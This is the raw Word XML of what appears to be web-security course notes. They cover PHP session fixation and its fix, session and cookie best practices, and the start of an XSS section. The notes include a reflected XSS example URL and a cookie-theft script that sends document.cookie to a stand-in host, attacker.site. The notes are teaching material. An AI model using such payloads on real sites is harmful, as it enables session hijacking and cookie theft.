      <w:r w:rsidRPr="00496876">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>($_SESSION['visits']</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00496876">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>)) {</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="21632054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 xml:space="preserve">    $_SESSION['visits'] = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00496876">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="72DBFA19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} else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C168B23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 xml:space="preserve">    $_SESSION['visits</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00496876">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>']++;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="07E4B9E0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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CBB7919" w14:textId="77777777" w:rsidR="00496876" w:rsidRP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echo $_SESSION['visits'</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00496876">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>];</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="78A47163" w14:textId="6F21B328" w:rsidR="00496876" w:rsidRDefault="00496876" w:rsidP="00496876">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00496876">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78DB6969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Secure Solution (regenerate session ID):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38DCAF2D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&lt;?</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F70556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="05393382" w14:textId="77777777" w:rsidR="00F70556" w:rsidRPr="00F70556" w:rsidRDefault="00F70556" w:rsidP="00F70556">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F70556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>session_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F70556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>start</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F70556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7E79B3C0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if </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F70556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(!</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F70556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>isset</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F70556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>($_SESSION['initiated']</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F70556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>)) {</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1DF1CF6D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    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F70556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>session_regenerate_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F70556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F70556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>();  /</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F70556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>/ Critical step</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60AF5A0B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    $_SESSION['initiated'] = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F70556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>true;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="421E42D8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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF7330F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// Also regenerate after login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6E9114" w14:textId="77777777" w:rsidR="00F70556" w:rsidRPr="00F70556" w:rsidRDefault="00F70556" w:rsidP="00F70556">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F70556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>session_regenerate_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F70556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F70556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="76690EE4" w14:textId="3FC082CF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?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E184E4B" w14:textId="77777777" w:rsidR="00F70556" w:rsidRDefault="00F70556" w:rsidP="00F70556">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20D092A9" w14:textId="77777777" w:rsidR="00F70556" w:rsidRDefault="00F70556" w:rsidP="00F70556">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EB07BAB" w14:textId="77777777" w:rsidR="00F70556" w:rsidRDefault="00F70556" w:rsidP="00F70556">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F13882E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lastRenderedPageBreak/>
        <w:t>3. Poor Session Practices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AFD4CFF" w14:textId="335513C3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Sharing URLs with Session IDs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1087B6" w14:textId="61E3DF01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http://site.com/page;jsessionid=ABC123?dest=Germany</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24334928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Risk: Session ID leaked in browser history, logs, referrer headers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8A368E" w14:textId="77777777" w:rsidR="00F70556" w:rsidRPr="00F70556" w:rsidRDefault="00F70556" w:rsidP="00F70556">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19CDBC1A" w14:textId="7DEF07EB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Forgetting to Logout:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54CAD8FD" w14:textId="560FCB6A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Long session timeouts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00DDD6B9" w14:textId="36FB83E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Session reuse on shared computers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154BECCE" w14:textId="69FF8842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Remote access risks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FCAE375" w14:textId="77777777" w:rsidR="00F70556" w:rsidRDefault="00F70556" w:rsidP="00F70556">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E4E23C1" w14:textId="1584B96D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Using Insecure Identifiers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="783926DD" w14:textId="1FCA4DBC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Bad: IP address + username/password (predictable, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F70556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>spoofable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F70556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4394F51B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Good: Long, random numbers/strings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448BDA5C" w14:textId="77777777" w:rsidR="00F70556" w:rsidRPr="00F70556" w:rsidRDefault="00F70556" w:rsidP="00F70556">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4444D530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Best Practices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F090B97" w14:textId="2F14F58C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Secure Session Management:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19938808" w14:textId="521CC3F1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Use built-in session APIs (PHP: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F70556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>session_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F70556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>start</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F70556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F70556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">), </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F70556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>session_regenerate_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F70556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F70556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F70556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788C8BA2" w14:textId="3495C45A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Set appropriate session timeouts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3385D7" w14:textId="709A7554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Implement secure logout functionality</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D26874" w14:textId="77777777" w:rsidR="00F70556" w:rsidRPr="00F70556" w:rsidRDefault="00F70556" w:rsidP="00F70556">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48EA0560" w14:textId="77777777" w:rsidR="00F70556" w:rsidRDefault="00F70556" w:rsidP="00F70556">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="402D2E1A" w14:textId="77777777" w:rsidR="00F70556" w:rsidRDefault="00F70556" w:rsidP="00F70556">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79E8665D" w14:textId="77777777" w:rsidR="00F70556" w:rsidRDefault="00F70556" w:rsidP="00F70556">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F286D33" w14:textId="204E60E8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lastRenderedPageBreak/>
        <w:t>Cookie Security:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D87BE6" w14:textId="4457BBF5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Always use Secure flag for HTTPS-only transmission</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045D6D7A" w14:textId="63AC05EE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Use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F70556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>HttpOnly</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F70556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> flag to prevent JavaScript access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3D8584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Set appropriate </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F70556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>SameSite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F70556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> attribute (Strict/Lax)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4637C22A" w14:textId="77777777" w:rsidR="00F70556" w:rsidRPr="00F70556" w:rsidRDefault="00F70556" w:rsidP="00F70556">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51F49A38" w14:textId="596C56F2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Additional Protections:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FCF34F3" w14:textId="2C5079CD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Multi-factor authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6A89E7" w14:textId="265D78ED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Monitor for concurrent sessions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746F750F" w14:textId="6AF4F290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Implement account lockout policies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081964AE" w14:textId="72EAC359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Regular password expiration (controversial)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A346249" w14:textId="77777777" w:rsidR="00F70556" w:rsidRDefault="00F70556" w:rsidP="00F70556">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32C0DD18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6. Cross-Site Scripting (XSS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BEEA59B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Definition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D83131" w14:textId="76AB87B9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Ability to inject malicious scripts into web pages viewed by other users, executed in their browser context.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F581A8" w14:textId="77777777" w:rsidR="00F70556" w:rsidRPr="00F70556" w:rsidRDefault="00F70556" w:rsidP="00F70556">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38E3D1FC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Browser Execution Model</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="484408CE" w14:textId="2A7BB0D9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Page Load: Browser loads content</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F5C6AA" w14:textId="663C2BC1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Rendering: Parses HTML, executes scripts/plugins</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E3AA13" w14:textId="2D676A6C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Event Handling: Responds to user interactions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42519A43" w14:textId="736A8CDE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User actions: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F70556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>onClick</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F70556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F70556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>onMouseover</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0F17735A" w14:textId="59AB2678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Page events: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F70556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>onLoad</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F70556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F70556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>onBeforeUnload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F70556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F70556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>onError</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="11B0FC1F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Timing: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F70556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>setTimeout</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F70556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F70556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">), </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F70556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>setInterval</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F70556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F70556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC4DC1F" w14:textId="77777777" w:rsidR="00F70556" w:rsidRPr="00F70556" w:rsidRDefault="00F70556" w:rsidP="00F70556">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="143D6735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XSS Types</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12AD1CD8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1. Reflected (Non-Persistent) XSS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09FA5891" w14:textId="15EFB352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Malicious script included in request to server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C59CF0" w14:textId="27BF0F95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Server reflects script in response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="756B394E" w14:textId="692295C0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Victim executes script when viewing response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F398FC2" w14:textId="77777777" w:rsidR="00F70556" w:rsidRDefault="00F70556" w:rsidP="00F70556">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="327972B9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Example Attack:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FFBC1F5" w14:textId="2E34D884" w:rsidR="00F70556" w:rsidRDefault="00F70556" w:rsidP="00F70556">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="000360D0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>http://vulnerable.site/search?q=&lt;script&gt;alert('XSS')&lt;/script</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00F70556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22DCC0C3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Cookie Theft Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377B11E6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http://vulnerable.site/welcome?name=&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076A7508" w14:textId="77777777" w:rsidR="00F70556" w:rsidRPr="00F70556" w:rsidRDefault="00F70556" w:rsidP="00F70556">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F70556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>window.open</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F70556">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>("http://attacker.site/collect?cookie="+document.cookie)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="382B9BBB" w14:textId="1A186A88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&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AFC7239" w14:textId="77777777" w:rsidR="00F70556" w:rsidRDefault="00F70556" w:rsidP="00F70556">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="237C795B" w14:textId="77777777" w:rsidR="00F70556" w:rsidRDefault="00F70556" w:rsidP="00F70556">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68131B15" w14:textId="77777777" w:rsidR="00F70556" w:rsidRDefault="00F70556" w:rsidP="00F70556">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A32BB2D" w14:textId="77777777" w:rsidR="00F70556" w:rsidRDefault="00F70556" w:rsidP="00F70556">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12DA22CE" w14:textId="77777777" w:rsidR="00F70556" w:rsidRDefault="00F70556" w:rsidP="00F70556">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28FA3F19" w14:textId="77777777" w:rsidR="00F70556" w:rsidRDefault="00F70556" w:rsidP="00F70556">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50DD8B69" w14:textId="77777777" w:rsidR="00F70556" w:rsidRDefault="00F70556" w:rsidP="00F70556">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="776600A5" w14:textId="77777777" w:rsidR="00F70556" w:rsidRDefault="00F70556" w:rsidP="00F70556">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C0C0B20" w14:textId="77777777" w:rsidR="00F70556" w:rsidRDefault="00F70556" w:rsidP="00F70556">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29FE846B" w14:textId="77777777" w:rsidR="00F70556" w:rsidRDefault="00F70556" w:rsidP="00F70556">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75F815AD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lastRenderedPageBreak/>
        <w:t>2. Stored (Persistent) XSS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC77033" w14:textId="74740D3B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Malicious script stored on server (database, file)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4906F1AE" w14:textId="232C9356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Served to multiple users over time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A727C86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Higher impact than reflected XSS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="051FF221" w14:textId="77777777" w:rsidR="00F70556" w:rsidRPr="00F70556" w:rsidRDefault="00F70556" w:rsidP="00F70556">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B511C8C" w14:textId="001D0A4F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Common Attack Vectors:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51FD1EF4" w14:textId="752137C9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User comments/forums</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71837DEF" w14:textId="166617FA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User profiles (display names, bios)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D22E0A9" w14:textId="65B2A0B8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File uploads (malicious filenames)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E117422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Product reviews</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA113CA" w14:textId="77777777" w:rsidR="00F70556" w:rsidRPr="00F70556" w:rsidRDefault="00F70556" w:rsidP="00F70556">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34812B9D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3. DOM-Based XSS</w:t>
      </w:r>
    </w:p>
